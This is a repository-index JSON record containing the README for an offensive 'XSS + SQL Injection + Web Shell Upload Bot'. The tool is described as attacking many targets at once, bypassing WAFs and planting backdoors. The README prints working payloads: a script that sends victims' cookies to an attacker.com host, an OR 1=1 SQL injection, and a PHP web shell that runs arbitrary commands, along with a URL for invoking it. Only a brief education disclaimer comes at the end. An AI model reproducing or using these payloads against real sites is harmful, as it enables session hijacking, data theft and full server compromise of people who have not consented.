{"id":26061683,"url":"https://github.com/cyberheroess/xss-sqli","last_synced_at":"2026-04-19T12:39:29.699Z","repository":{"id":281280648,"uuid":"944799600","full_name":"Cyberheroess/XSS-SQLI","owner":"Cyberheroess","description":"XSS + SQL Injection + Web Shell Upload Bot","archived":false,"fork":false,"pushed_at":"2025-03-08T02:09:41.000Z","size":0,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-08T02:26:32.113Z","etag":null,"topics":["sql-injection","sqlalchemy","sqlite","sqlite3","xss","xss-attacks","xss-detection","xss-exploitation","xss-scanner","xss-vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Cyberheroess.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-03-08T01:45:02.000Z","updated_at":"2025-03-08T02:13:23.000Z","dependencies_parsed_at":"2025-03-08T02:36:36.206Z","dependency_job_id":null,"html_url":"https://github.com/Cyberheroess/XSS-SQLI","commit_stats":null,"previous_names":["cyberheroess/xss-sqli"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cyberheroess%2FXSS-SQLI","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cyberheroess%2FXSS-SQLI/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cyberheroess%2FXSS-SQLI/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cyberheroess%2FXSS-SQLI/mani
fests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Cyberheroess","download_url":"https://codeload.github.com/Cyberheroess/XSS-SQLI/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":242566165,"owners_count":20150481,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["sql-injection","sqlalchemy","sqlite","sqlite3","xss","xss-attacks","xss-detection","xss-exploitation","xss-scanner","xss-vulnerability"],"created_at":"2025-03-08T15:13:06.513Z","updated_at":"2026-04-19T12:39:29.663Z","avatar_url":"https://github.com/Cyberheroess.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# XSS-SQLI\nXSS + SQL Injection + Web Shell Upload Bot\n---\n\n# **XSS + SQL Injection + Web Shell Upload Bot**  \n**Version: 1.0**  \n\n## **📌 About This Script**  \nThis script is a **simple bot** that combines three common web attack techniques:  \n![17413997546818279413700194614756](https://github.com/user-attachments/assets/334b0168-6210-4f37-b99a-6ffbececf19b)\n\n1️⃣ **XSS (Cross-Site Scripting)** → Injects a malicious script to steal the user's **cookie/session**.  \n2️⃣ **SQL Injection** → Exploits an SQL flaw to obtain **sensitive data** from the database.  \n3️⃣ **Web Shell Upload** → Uploads a shell file to gain **full access to the server**.  \n\n---\n\n## **⚙️ How the Script Works**  \n✅ **The user enters a target** (manually or from a file).  \n✅ **The bot runs the attacks in sequence** (XSS → SQLi → Web Shell).  
\n✅ **If the SQL injection succeeds**, it proceeds to **upload the web shell** automatically.  \n✅ **The attacks use advanced encoding** to **bypass WAFs**.  \n✅ **Uses multi-threading** so it can attack many targets at once.  \n\n---\n\n## **📂 Main Features**  \n✔️ **Encrypted XSS payload** → Minimizes detection by WAFs.  \n✔️ **WAF bypass for SQL Injection** → Uses stealthier payloads.  \n✔️ **Web Shell Upload** → Plants a backdoor on the target server.  \n✔️ **Automated multi-threaded bot** → Can attack many targets in a short time.  \n✔️ **Error Handling** → The script will not crash if a target is down or unresponsive.  \n\n---\n\n## **🚀 How to Use**  \n### **1️⃣ Run the Script**  \n```bash\npython3 xss_sqli_shell.py\n```\n  \n### **2️⃣ Choose the Target Input Method**  \n1️⃣ **Manual** → Enter target URLs one at a time.  \n2️⃣ **From File** → Load the list of targets from a file (`targets.txt`).  \n\n**Example format of the `targets.txt` file**  \n```\nhttp://victim.com/vuln.php?input=\nhttp://testsite.com/comment.php?msg=\n```\n\n---\n\n## **🔴 Attack Examples**  \n📌 **XSS Attack:**  \n```html\n\u003cscript\u003edocument.location='http://attacker.com/steal.php?cookie='+document.cookie\u003c/script\u003e\n```\n\n📌 **SQL Injection:**  \n```sql\n' OR 1=1--\n```\n\n📌 **Web Shell Upload:**  \n- Uploads a `shell.php` file containing:  \n```php\n\u003c?php system($_GET['cmd']); ?\u003e\n```\n- Once it succeeds, access the shell:  \n```\nhttp://target.com/uploads/shell.php?cmd=whoami\n```\n\n---\n\n## **📌 Notes**  \n🔹 This script is **simple** and intended only for **education** about web security.  \n🔹 Do not use it for anything illegal! Use it only on **systems you own or have official permission for**.  \n🔹 **Make sure you understand the basic concepts of web security** before using this script.  
\n\n---\n\n## **👨‍💻 Created By**  \n🛠️ **Cyber-Heroes** - Web Security Education \u0026 Experimentation  \n---\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcyberheroess%2Fxss-sqli","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcyberheroess%2Fxss-sqli","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcyberheroess%2Fxss-sqli/lists"}